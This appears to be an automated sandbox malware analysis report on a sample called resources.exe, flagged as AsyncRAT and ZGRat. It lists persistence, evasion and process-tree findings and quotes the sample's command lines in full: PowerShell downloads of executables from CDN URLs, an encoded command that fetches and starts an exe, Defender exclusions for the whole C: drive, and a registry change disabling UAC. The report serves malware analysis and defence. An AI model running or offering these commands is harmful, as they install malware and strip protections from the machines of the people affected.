Malware Analysis Report

2025-08-10 19:35

Sample ID 231115-mstg4ahb3z
Target resources.exe
SHA256 f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Tags
asyncrat zgrat operacert windefault evasion persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a

Threat Level: Known bad

The file resources.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat zgrat operacert windefault evasion persistence rat trojan

ZGRat

Detect ZGRat V1

UAC bypass

AsyncRat

Async RAT payload

Downloads MZ/PE file

Blocklisted process makes network request

Drops startup file

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Creates scheduled task(s)

Runs net.exe

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-15 10:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-15 10:44

Reported

2023-11-15 10:46

Platform

win10v2004-20231023-en

Max time kernel

154s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunNihaiersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunihaiVersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\2WinDefault.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\resources.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2784 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 528 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 528 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 528 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 528 wrote to memory of 1952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 1952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 1952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 528 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 528 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 528 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 528 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 528 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4632 wrote to memory of 2224 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 4632 wrote to memory of 2224 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 4632 wrote to memory of 2224 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 4964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2224 wrote to memory of 4964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2224 wrote to memory of 4964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4964 wrote to memory of 4596 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4964 wrote to memory of 4596 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4964 wrote to memory of 4596 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2224 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 2224 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 2224 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 448 wrote to memory of 940 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 448 wrote to memory of 940 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 448 wrote to memory of 940 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 940 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 940 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 940 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4892 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunihaiVersion.exe
PID 528 wrote to memory of 4892 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunihaiVersion.exe
PID 528 wrote to memory of 4892 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunihaiVersion.exe
PID 4892 wrote to memory of 4784 N/A C:\Users\Public\Music\RunihaiVersion.exe C:\Windows\SysWOW64\cmd.exe
PID 4892 wrote to memory of 4784 N/A C:\Users\Public\Music\RunihaiVersion.exe C:\Windows\SysWOW64\cmd.exe
PID 4892 wrote to memory of 4784 N/A C:\Users\Public\Music\RunihaiVersion.exe C:\Windows\SysWOW64\cmd.exe
PID 4784 wrote to memory of 2828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4784 wrote to memory of 2828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4784 wrote to memory of 2828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2828 wrote to memory of 1304 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\ac3394b1-15fa-4530-a4f8-44c3419ad2ab.bat

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"

C:\Users\Public\Music\RunNihaiersion.exe

RunNihaiersion.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil.exe

"C:\Users\Public\Music\israil.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"

C:\Users\Public\Music\RunihaiVersion.exe

RunihaiVersion.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil2.exe

"C:\Users\Public\Music\israil2.exe"

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"

C:\Users\Admin\AppData\Local\Temp\xx.exe

xx.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe

C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe

C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe

C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe

C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

